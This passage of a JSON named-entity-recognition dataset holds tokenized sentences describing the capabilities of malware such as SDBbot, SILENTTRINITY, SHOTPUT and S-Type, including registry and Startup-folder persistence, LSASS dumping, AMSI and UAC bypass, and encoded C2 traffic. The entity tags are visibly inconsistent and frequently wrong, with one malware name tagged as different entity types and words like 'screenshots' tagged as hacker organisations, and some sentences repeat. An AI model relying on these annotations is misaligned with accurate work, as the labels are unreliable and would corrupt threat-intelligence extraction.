"O", "O", "O", "O" ] }, { "tokens": [ "S-Type", "may", "save", "itself", "as", "a", "file", "named", "`msdtc.exe`,", "which", "is", "also", "the", "name", "of", "the", "legitimate", "Microsoft", "Distributed", "Transaction", "Coordinator", "service", "binary." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "B-Org", "O", "O" ] }, { "tokens": [ "S-Type", "has", "used", "Windows", "APIs,", "including", "`GetKeyboardType`,", "`NetUserAdd`,", "and", "`NetUserDel`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "S-Type", "may", "create", "a", ".lnk", "file", "to", "itself", "that", "is", "saved", "in", "the", "Start", "menu", "folder.", "It", "may", "also", "create", "the", "Registry", "key", "<code>HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\", "IMJPMIJ8.1{3", "characters", "of", "Unique", "Identifier}</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-HackOrg", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "S-Type", "may", "create", "the", "file", "<code>%HOMEPATH%\\Start", "Menu\\Programs\\Startup\\Realtek", "{Unique", "Identifier}.lnk</code>,", "which", "points", "to", "the", "malicious", "`msdtc.exe`", "file", "already", "created", "in", "the", "`%CommonFiles%`", "directory." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Some", "S-Type", "samples", "have", "been", "packed", "with", "UPX." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "S-Type", "uses", "Base64", "encoding", "for", "C2", "traffic." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "initial", "beacon", "packet", "for", "S-Type", "contains", "the", "operating", "system", "version", "and", "file", "system", "of", "the", "victim." ], "ner_tags": [ "O", "O", "I-Way", "I-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "S-Type", "has", "attempted", "to", "determine", "if", "a", "compromised", "system", "was", "using", "a", "Japanese", "keyboard", "via", "the", "`GetKeyboardType`", "API", "call." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "S-Type", "has", "used", "`ipconfig", "/all`", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "S-Type", "has", "run", "tests", "to", "determine", "the", "privilege", "level", "of", "the", "compromised", "user." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "S-Type", "runs", "the", "command", "<code>net", "start</code>", "on", "a", "victim." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "S-Type", "uses", "HTTP", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O" ] }, { "tokens": [ "S-Type", "has", "provided", "the", "ability", "to", "execute", "shell", "commands", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "SDBbot", "has", "the", "ability", "to", "use", "application", "shimming", "for", "persistence", "if", "it", "detects", "it", "is", "running", "as", "admin", "on", "Windows", "XP", "or", "7,", "by", "creating", "a", "shim", "database", "to", "patch", "services.exe." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "SDBbot", "has", "the", "ability", "to", "access", "the", "file", "system", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SDBbot", "has", "the", "ability", "to", "decrypt", "and", "decompress", "its", "payload", "to", "enable", "code", "execution." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SDBbot", "has", "the", "ability", "to", "inject", "a", "downloaded", "DLL", "into", "a", "newly", "created", "rundll32.exe", "process." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "I-Features", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "SDBbot", "has", "sent", "collected", "data", "from", "a", "compromised", "host", "to", "its", "C2", "servers." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SDBbot", "has", "the", "ability", "to", "delete", "files", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "SDBbot", "has", "the", "ability", "to", "get", "directory", "listings", "or", "drive", "information", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "SDBbot", "has", "the", "ability", "to", "use", "image", "file", "execution", "options", "for", "persistence", "if", "it", "detects", "it", "is", "running", "with", "admin", "privileges", "on", "a", "Windows", "version", "newer", "than", "Windows", "7." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SDBbot", "has", "the", "ability", "to", "clean", "up", "and", "remove", "data", "structures", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "SDBbot", "has", "the", "ability", "to", "download", "a", "DLL", "from", "C2", "to", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SDBbot", "has", "the", "ability", "to", "communicate", "with", "C2", "with", "TCP", "over", "port", "443." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "SDBbot", "has", "the", "ability", "to", "XOR", "the", "strings", "for", "its", "installer", "component", "with", "a", "hardcoded", "128", "byte", "key." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SDBbot", "can", "enumerate", "a", "list", "of", "running", "processes", "on", "a", "compromised", "machine." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SDBbot", "has", "the", "ability", "to", "use", "port", "forwarding", "to", "establish", "a", "proxy", "between", "a", "target", "host", "and", "C2." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SDBbot", "has", "the", "ability", "to", "add", "a", "value", "to", "the", "Registry", "Run", "key", "to", "establish", "persistence", "if", "it", "detects", "it", "is", "running", "with", "regular", "user", "privilege." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SDBbot", "has", "the", "ability", "to", "use", "RDP", "to", "connect", "to", "victim's", "machines." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SDBbot", "has", "used", "rundll32.exe", "to", "execute", "DLLs." ], "ner_tags": [ "B-Way", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "SDBbot", "has", "used", "a", "packed", "installer", "file." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Tool", "B-Way", "O" ] }, { "tokens": [ "SDBbot", "has", "the", "ability", "to", "identify", "the", "OS", "version,", "OS", "bit", "information", "and", "computer", "name." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SDBbot", "can", "collected", "the", "country", "code", "of", "a", "compromised", "machine." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SDBbot", "has", "the", "ability", "to", "determine", "the", "domain", "name", "and", "whether", "a", "proxy", "is", "configured", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SDBbot", "has", "the", "ability", "to", "identify", "the", "user", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SDBbot", "has", "the", "ability", "to", "record", "video", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "SDBbot", "has", "the", "ability", "to", "use", "the", "command", "shell", "to", "execute", "commands", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SDelete", "deletes", "data", "in", "a", "way", "that", "makes", "it", "unrecoverable." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SDelete", "deletes", "data", "in", "a", "way", "that", "makes", "it", "unrecoverable." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SEASHARPEE", "can", "download", "remote", "files", "onto", "victims." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "SEASHARPEE", "can", "timestomp", "files", "on", "victims", "using", "a", "Web", "shell." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "SEASHARPEE", "is", "a", "Web", "shell." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Tool", "O" ] }, { "tokens": [ "SEASHARPEE", "can", "execute", "commands", "on", "victims." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SHARPSTATS", "has", "used", "base64", "encoding", "and", "XOR", "to", "obfuscate", "PowerShell", "scripts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "SHARPSTATS", "has", "the", "ability", "to", "upload", "and", "download", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "I-Features", "O" ] }, { "tokens": [ "SHARPSTATS", "has", "the", "ability", "to", "employ", "a", "custom", "PowerShell", "script." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "SHARPSTATS", "has", "the", "ability", "to", "identify", "the", "IP", "address,", "machine", "name,", "and", "OS", "of", "the", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SHARPSTATS", "has", "the", "ability", "to", "identify", "the", "domain", "of", "the", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SHARPSTATS", "has", "the", "ability", "to", "identify", "the", "username", "on", "the", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SHARPSTATS", "has", "the", "ability", "to", "identify", "the", "current", "date", "and", "time", "on", "the", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SHIPSHAPE", "achieves", "persistence", "by", "creating", "a", "shortcut", "in", "the", "Startup", "folder." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "APT30", "may", "have", "used", "the", "SHIPSHAPE", "malware", "to", "move", "onto", "air-gapped", "networks.", "SHIPSHAPE", "targets", "removable", "drives", "to", "spread", "to", "other", "systems", "by", "modifying", "the", "drive", "to", "use", "Autorun", "to", "execute", "or", "by", "hiding", "legitimate", "document", "files", "and", "copying", "an", "executable", "to", "the", "folder", "with", "the", "same", "name", "as", "the", "legitimate", "document." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SHIPSHAPE", "achieves", "persistence", "by", "creating", "a", "shortcut", "in", "the", "Startup", "folder." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "SHOTPUT", "has", "a", "command", "to", "obtain", "a", "directory", "listing." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "SHOTPUT", "has", "a", "command", "to", "retrieve", "information", "about", "connected", "users." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SHOTPUT", "is", "obscured", "using", "XOR", "encoding", "and", "appended", "to", "a", "valid", "GIF", "file." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SHOTPUT", "has", "a", "command", "to", "obtain", "a", "process", "listing." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SHOTPUT", "has", "a", "command", "to", "list", "all", "servers", "in", "the", "domain,", "as", "well", "as", "one", "to", "locate", "domain", "controllers", "on", "a", "domain." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "SHOTPUT", "uses", "netstat", "to", "list", "TCP", "connection", "status." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SHUTTERSPEED", "can", "download", "and", "execute", "an", "arbitary", "executable." ], "ner_tags": [ "B-Idus", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SHUTTERSPEED", "can", "capture", "screenshots." ], "ner_tags": [ "B-Way", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "SHUTTERSPEED", "can", "collect", "system", "information." ], "ner_tags": [ "B-Idus", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "SILENTTRINITY", "can", "enumerate", "the", "active", "Window", "during", "keylogging", "through", "execution", "of", "`GetActiveWindowTitle`." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "contains", "a", "number", "of", "modules", "that", "can", "bypass", "UAC,", "including", "through", "Window's", "Device", "Manager,", "Manage", "Optional", "Features,", "and", "an", "image", "hijack", "on", "the", "`.msc`", "file", "extension." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "can", "conduct", "an", "image", "hijack", "of", "an", "`.msc`", "file", "extension", "as", "part", "of", "its", "UAC", "bypass", "process." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "can", "add", "a", "CLSID", "key", "for", "payload", "execution", "through", "`Registry.CurrentUser.CreateSubKey(\"Software\\\\Classes\\\\CLSID\\\\{\"", "+", "clsid", "+", "\"}\\\\InProcServer32\")`." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "B-Way", "B-Features", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "can", "collect", "clear", "text", "web", "credentials", "for", "Internet", "Explorer/Edge." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY's", "`amsiPatch.py`", "module", "can", "disable", "Antimalware", "Scan", "Interface", "(AMSI)", "functions." ], "ner_tags": [ "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "can", "use", "`System`", "namespace", "methods", "to", "execute", "lateral", "movement", "using", "DCOM." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "SILENTTRINITY", "can", "use", "`System.Security.AccessControl`", "namespaces", "to", "retrieve", "domain", "user", "information." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "can", "use", "`System.DirectoryServices`", "namespace", "to", "retrieve", "domain", "group", "information." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "can", "transfer", "files", "from", "an", "infected", "host", "to", "the", "C2", "server." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "can", "remove", "files", "from", "the", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "has", "several", "modules,", "such", "as", "`ls.py`,", "`pwd.py`,", "and", "`recentFiles.py`,", "to", "enumerate", "directories", "and", "files." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY's", "`credphisher.py`", "module", "can", "prompt", "a", "current", "user", "for", "their", "credentials." ], "ner_tags": [ "B-Way", "B-SamFile", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "has", "a", "module", "that", "can", "extract", "cached", "GPP", "passwords." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "has", "the", "ability", "to", "set", "its", "window", "state", "to", "hidden." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "can", "bypass", "ScriptBlock", "logging", "to", "execute", "unmanaged", "PowerShell", "code", "from", "memory." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "can", "remove", "artifacts", "from", "the", "compromised", "host,", "including", "created", "Registry", "keys." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "can", "load", "additional", "files", "and", "tools,", "including", "Mimikatz." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "B-Way" ] }, { "tokens": [ "SILENTTRINITY", "contains", "a", "module", "to", "conduct", "Kerberoasting." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "SILENTTRINITY", "has", "a", "keylogging", "capability." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "can", "create", "a", "memory", "dump", "of", "LSASS", "via", "the", "`MiniDumpWriteDump", "Win32`", "API", "call." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "O", "B-Way", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "can", "obtain", "a", "list", "of", "local", "groups", "and", "members." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "can", "create", "a", "backdoor", "in", "KeePass", "using", "a", "malicious", "config", "file", "and", "in", "TortoiseSVN", "using", "a", "registry", "hook." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "B-Way", "B-Tool", "B-SamFile", "O", "O", "B-Way", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "SILENTTRINITY", "can", "modify", "registry", "keys,", "including", "to", "enable", "or", "disable", "Remote", "Desktop", "Protocol", "(RDP)." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "B-Way" ] }, { "tokens": [ "SILENTTRINITY", "has", "the", "ability", "to", "leverage", "API", "including", "`GetProcAddress`", "and", "`LoadLibrary`." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "SILENTTRINITY", "can", "scan", "for", "open", "ports", "on", "a", "compromised", "machine." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "can", "enumerate", "shares", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "can", "use", "PowerShell", "to", "execute", "commands." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "can", "enumerate", "processes,", "including", "properties", "to", "determine", "if", "they", "have", "the", "Common", "Language", "Runtime", "(CLR)", "loaded." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "can", "inject", "shellcode", "directly", "into", "Excel.exe", "or", "a", "specific", "process." ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "is", "written", "in", "Python", "and", "can", "use", "multiple", "Python", "scripts", "for", "execution", "on", "targeted", "systems." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "can", "use", "the", "`GetRegValue`", "function", "to", "check", "Registry", "keys", "within", "`HKCU\\Software\\Policies\\Microsoft\\Windows\\Installer\\AlwaysInstallElevated`", "and", "`HKLM\\Software\\Policies\\Microsoft\\Windows\\Installer\\AlwaysInstallElevated`.", "It", "also", "contains", "additional", "modules", "that", "can", "check", "software", "AutoRun", "values", "and", "use", "the", "Win32", "namespace", "to", "get", "values", "from", "HKCU,", "HKLM,", "HKCR,", "and", "HKCC", "hives." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-Way", "B-Features", "O", "O", "O", "B-Way", "B-Features", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "O", "B-Way", "O" ] }, { "tokens": [ "SILENTTRINITY", "can", "establish", "a", "LNK", "file", "in", "the", "startup", "folder", "for", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "can", "enumerate", "and", "collect", "the", "properties", "of", "domain", "computers." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "can", "take", "a", "screenshot", "of", "the", "current", "desktop." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "can", "determine", "if", "an", "anti-virus", "product", "is", "installed", "through", "the", "resolution", "of", "the", "service's", "virtual", "SID." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "can", "collect", "information", "related", "to", "a", "compromised", "host,", "including", "OS", "version", "and", "a", "list", "of", "drives." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "can", "gather", "a", "list", "of", "logged", "on", "users." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "can", "search", "for", "modifiable", "services", "that", "could", "be", "used", "for", "privilege", "escalation." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "SILENTTRINITY", "can", "collect", "start", "time", "information", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "can", "find", "a", "process", "owned", "by", "a", "specific", "user", "and", "impersonate", "the", "associated", "token." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "can", "use", "`cmd.exe`", "to", "enable", "lateral", "movement", "using", "DCOM." ], "ner_tags": [ "B-Way", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "SILENTTRINITY", "can", "gather", "Windows", "Vault", "credentials." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "SILENTTRINITY", "can", "use", "WMI", "for", "lateral", "movement." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "can", "create", "a", "WMI", "Event", "to", "execute", "a", "payload", "for", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SILENTTRINITY", "tracks", "`TrustedHosts`", "and", "can", "move", "laterally", "to", "these", "targets", "via", "WinRM." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "SILENTTRINITY", "can", "establish", "persistence", "by", "creating", "a", "new", "service." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SLIGHTPULSE", "contains", "functionality", "to", "execute", "arbitrary", "commands", "passed", "to", "it." ], "ner_tags": [ "B-Way", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "SLIGHTPULSE", "can", "read", "files", "specified", "on", "the", "local", "system." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SLIGHTPULSE", "can", "deobfuscate", "base64", "encoded", "and", "RC4", "encrypted", "C2", "messages." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RAPIDPULSE", "can", "transfer", "files", "to", "and", "from", "compromised", "hosts." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SLIGHTPULSE", "has", "piped", "the", "output", "from", "executed", "commands", "to", "`/tmp/1`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SLIGHTPULSE", "can", "base64", "encode", "all", "incoming", "and", "outgoing", "C2", "messages." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SLIGHTPULSE", "can", "RC4", "encrypt", "all", "incoming", "and", "outgoing", "C2", "messages." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SLIGHTPULSE", "has", "the", "ability", "to", "process", "HTTP", "GET", "requests", "as", "a", "normal", 